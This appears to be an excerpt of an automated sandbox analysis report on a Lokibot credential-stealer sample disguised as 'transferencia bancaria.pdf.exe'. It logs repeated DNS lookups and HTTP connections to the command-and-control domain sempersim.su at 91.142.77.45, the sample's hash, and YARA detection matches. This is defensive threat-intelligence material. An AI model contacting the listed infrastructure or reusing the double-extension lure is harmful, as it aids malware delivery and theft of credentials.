                                      Nov 3, 2022 12:30:09.705056906 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:09.767577887 CET804970691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:09.767824888 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:09.785093069 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:09.847585917 CET804970691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:09.847696066 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:09.911494017 CET804970691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:11.378333092 CET804970691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:11.378524065 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:11.378582001 CET4970680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:11.441195965 CET804970691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:11.912462950 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:11.974523067 CET804970791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:11.974664927 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:11.977904081 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:12.039987087 CET804970791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:12.040091991 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:12.102111101 CET804970791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:13.686108112 CET804970791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:13.686407089 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:13.689996004 CET4970780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:13.752177954 CET804970791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:13.960999012 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:14.024719000 CET804970891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:14.024915934 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:14.035063982 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:14.097285032 CET804970891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:14.097431898 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:14.159482002 CET804970891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:15.684953928 CET804970891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:15.685059071 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:15.685152054 CET4970880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:15.747353077 CET804970891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:16.009772062 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:16.071901083 CET804970991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:16.072161913 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:16.075566053 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:16.137646914 CET804970991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:16.137861967 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:16.199959040 CET804970991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:17.656419039 CET804970991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:17.656625032 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:17.656876087 CET4970980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:17.718825102 CET804970991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:18.232103109 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:18.294275999 CET804971091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:18.294435978 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:18.297576904 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:18.359631062 CET804971091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:18.359889030 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:18.666949987 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:18.729307890 CET804971091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:19.791138887 CET804971091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:19.791312933 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:19.791399956 CET4971080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:19.853351116 CET804971091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:20.195004940 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:20.257170916 CET804971191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:20.260675907 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:20.264286041 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:20.326256037 CET804971191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:20.327415943 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:20.389652014 CET804971191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:21.541560888 CET804971191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:21.541733980 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:21.541781902 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:21.854696989 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.066165924 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.128371954 CET804971291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:22.128586054 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.162497044 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.224786043 CET804971291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:22.224951029 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.287046909 CET804971291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:22.464206934 CET4971180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:22.527188063 CET804971191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:23.556931019 CET804971291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:23.557039022 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:23.557166100 CET4971280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:23.619096041 CET804971291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:25.335967064 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:25.401177883 CET804971391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:25.401310921 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:25.414439917 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:25.476397991 CET804971391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:25.476478100 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:25.538403988 CET804971391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:26.998667002 CET804971391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:27.002180099 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.002180099 CET4971380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.064440012 CET804971391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:27.367080927 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.428744078 CET804971491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:27.428901911 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.432236910 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.493885994 CET804971491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:27.493982077 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:27.886517048 CET4971480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:28.386557102 CET4971480192.168.2.691.142.77.45
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 3, 2022 12:30:06.615612984 CET4978653192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:06.635174990 CET53497868.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:11.893251896 CET5859553192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:11.910538912 CET53585958.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:13.938466072 CET5633153192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:13.958684921 CET53563318.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:15.990658998 CET5050653192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:16.008389950 CET53505068.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:17.960731983 CET4944853192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:18.222553015 CET53494488.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:20.174104929 CET5908253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:20.193391085 CET53590828.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:22.044584990 CET5950453192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:22.064102888 CET53595048.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:25.312644958 CET6519853192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:25.332699060 CET53651988.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:27.345777988 CET6291053192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:27.365106106 CET53629108.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:30.240421057 CET6386353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:31.064527988 CET53638638.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:32.906943083 CET6322953192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:32.924936056 CET53632298.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:34.919732094 CET6253853192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:34.938977957 CET53625388.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:36.914690018 CET5490353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:36.935085058 CET53549038.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:41.510499001 CET5153053192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:41.802865028 CET53515308.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:45.704906940 CET5612253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:45.724493027 CET53561228.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:47.939956903 CET5255653192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:47.958667994 CET53525568.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:50.734925985 CET6160953192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:50.754672050 CET53616098.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:53.275834084 CET5248153192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:53.293008089 CET53524818.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:54.819243908 CET5394353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:54.838155985 CET53539438.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:57.832797050 CET5608653192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:57.850481033 CET53560868.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:59.560048103 CET5654753192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:59.579384089 CET53565478.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:01.170101881 CET5988153192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:01.189847946 CET53598818.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:03.812359095 CET5891753192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:03.831717968 CET53589178.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:05.602891922 CET5034353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:05.622453928 CET53503438.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:07.541344881 CET6252053192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:07.558957100 CET53625208.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:09.419343948 CET5562953192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:09.438843966 CET53556298.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:11.161881924 CET5207953192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:11.179299116 CET53520798.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:22.519120932 CET5656953192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:22.538552046 CET53565698.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:25.278309107 CET6183353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:25.295921087 CET53618338.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:27.427875996 CET6504453192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:27.445188999 CET53650448.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:29.125849009 CET6003253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:29.145350933 CET53600328.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:30.955920935 CET4923253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:30.976178885 CET53492328.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:32.930668116 CET5612353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:32.949887991 CET53561238.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:35.521024942 CET5975253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:35.540065050 CET53597528.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:37.538077116 CET5286553192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:37.555300951 CET53528658.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:39.862227917 CET5732253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:39.879426956 CET53573228.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:41.802947998 CET6295853192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:41.821785927 CET53629588.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:43.694916964 CET6440453192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:43.714163065 CET53644048.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:45.492507935 CET6284853192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:45.510040045 CET53628488.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:47.481296062 CET5595653192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:47.499958038 CET53559568.8.8.8192.168.2.6
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Nov 3, 2022 12:30:06.615612984 CET192.168.2.68.8.8.80x9698Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:11.893251896 CET192.168.2.68.8.8.80x836Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:13.938466072 CET192.168.2.68.8.8.80x6c7fStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:15.990658998 CET192.168.2.68.8.8.80x898bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:17.960731983 CET192.168.2.68.8.8.80xfd9Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:20.174104929 CET192.168.2.68.8.8.80xb2c5Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:22.044584990 CET192.168.2.68.8.8.80x3dfStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:25.312644958 CET192.168.2.68.8.8.80x1b5bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:27.345777988 CET192.168.2.68.8.8.80x744cStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:30.240421057 CET192.168.2.68.8.8.80x679bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:32.906943083 CET192.168.2.68.8.8.80x93fcStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:34.919732094 CET192.168.2.68.8.8.80xf5b2Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:36.914690018 CET192.168.2.68.8.8.80x4e0bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:41.510499001 CET192.168.2.68.8.8.80x72fStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:45.704906940 CET192.168.2.68.8.8.80x2cbbStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:47.939956903 CET192.168.2.68.8.8.80x5480Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:50.734925985 CET192.168.2.68.8.8.80xeac7Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:53.275834084 CET192.168.2.68.8.8.80xa703Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:54.819243908 CET192.168.2.68.8.8.80xb2a0Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:57.832797050 CET192.168.2.68.8.8.80x101aStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:59.560048103 CET192.168.2.68.8.8.80x26c2Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:01.170101881 CET192.168.2.68.8.8.80x2de9Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:03.812359095 CET192.168.2.68.8.8.80x997dStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:05.602891922 CET192.168.2.68.8.8.80xdc66Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:07.541344881 CET192.168.2.68.8.8.80x2825Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:09.419343948 CET192.168.2.68.8.8.80xa44cStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:11.161881924 CET192.168.2.68.8.8.80xbf26Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:22.519120932 CET192.168.2.68.8.8.80x8b48Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:25.278309107 CET192.168.2.68.8.8.80x6a31Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:27.427875996 CET192.168.2.68.8.8.80x81d8Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:29.125849009 CET192.168.2.68.8.8.80x5fdStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:30.955920935 CET192.168.2.68.8.8.80x984bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:32.930668116 CET192.168.2.68.8.8.80x5c96Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:35.521024942 CET192.168.2.68.8.8.80x9f71Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:37.538077116 CET192.168.2.68.8.8.80x396fStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:39.862227917 CET192.168.2.68.8.8.80xc65Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:41.802947998 CET192.168.2.68.8.8.80xe860Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:43.694916964 CET192.168.2.68.8.8.80x4f0dStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:45.492507935 CET192.168.2.68.8.8.80x845aStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:47.481296062 CET192.168.2.68.8.8.80xe70Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Nov 3, 2022 12:30:06.635174990 CET8.8.8.8192.168.2.60x9698No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:11.910538912 CET8.8.8.8192.168.2.60x836No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:13.958684921 CET8.8.8.8192.168.2.60x6c7fNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:16.008389950 CET8.8.8.8192.168.2.60x898bNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:18.222553015 CET8.8.8.8192.168.2.60xfd9No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:20.193391085 CET8.8.8.8192.168.2.60xb2c5No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:22.064102888 CET8.8.8.8192.168.2.60x3dfNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:25.332699060 CET8.8.8.8192.168.2.60x1b5bNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:27.365106106 CET8.8.8.8192.168.2.60x744cNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:31.064527988 CET8.8.8.8192.168.2.60x679bNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:32.924936056 CET8.8.8.8192.168.2.60x93fcNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:34.938977957 CET8.8.8.8192.168.2.60xf5b2No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:36.935085058 CET8.8.8.8192.168.2.60x4e0bNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:41.802865028 CET8.8.8.8192.168.2.60x72fNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:45.724493027 CET8.8.8.8192.168.2.60x2cbbNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:47.958667994 CET8.8.8.8192.168.2.60x5480No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:50.754672050 CET8.8.8.8192.168.2.60xeac7No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:53.293008089 CET8.8.8.8192.168.2.60xa703No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:54.838155985 CET8.8.8.8192.168.2.60xb2a0No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:57.850481033 CET8.8.8.8192.168.2.60x101aNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:59.579384089 CET8.8.8.8192.168.2.60x26c2No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:01.189847946 CET8.8.8.8192.168.2.60x2de9No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:03.831717968 CET8.8.8.8192.168.2.60x997dNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:05.622453928 CET8.8.8.8192.168.2.60xdc66No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:07.558957100 CET8.8.8.8192.168.2.60x2825No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:09.438843966 CET8.8.8.8192.168.2.60xa44cNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:11.179299116 CET8.8.8.8192.168.2.60xbf26No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:22.538552046 CET8.8.8.8192.168.2.60x8b48No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:25.295921087 CET8.8.8.8192.168.2.60x6a31No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:27.445188999 CET8.8.8.8192.168.2.60x81d8No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:29.145350933 CET8.8.8.8192.168.2.60x5fdNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:30.976178885 CET8.8.8.8192.168.2.60x984bNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:32.949887991 CET8.8.8.8192.168.2.60x5c96No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:35.540065050 CET8.8.8.8192.168.2.60x9f71No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:37.555300951 CET8.8.8.8192.168.2.60x396fNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:39.879426956 CET8.8.8.8192.168.2.60xc65No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:41.821785927 CET8.8.8.8192.168.2.60xe860No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:43.714163065 CET8.8.8.8192.168.2.60x4f0dNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:45.510040045 CET8.8.8.8192.168.2.60x845aNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:47.499958038 CET8.8.8.8192.168.2.60xe70No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      • sempersim.su

                                      Click to jump to process

                                      Target ID:0
                                      Start time:12:29:47
                                      Start date:03/11/2022
                                      Path:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      Imagebase:0xf40000
                                      File size:811008 bytes
                                      MD5 hash:355EFB2E1F7DD361F8E7CDA449A45EAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
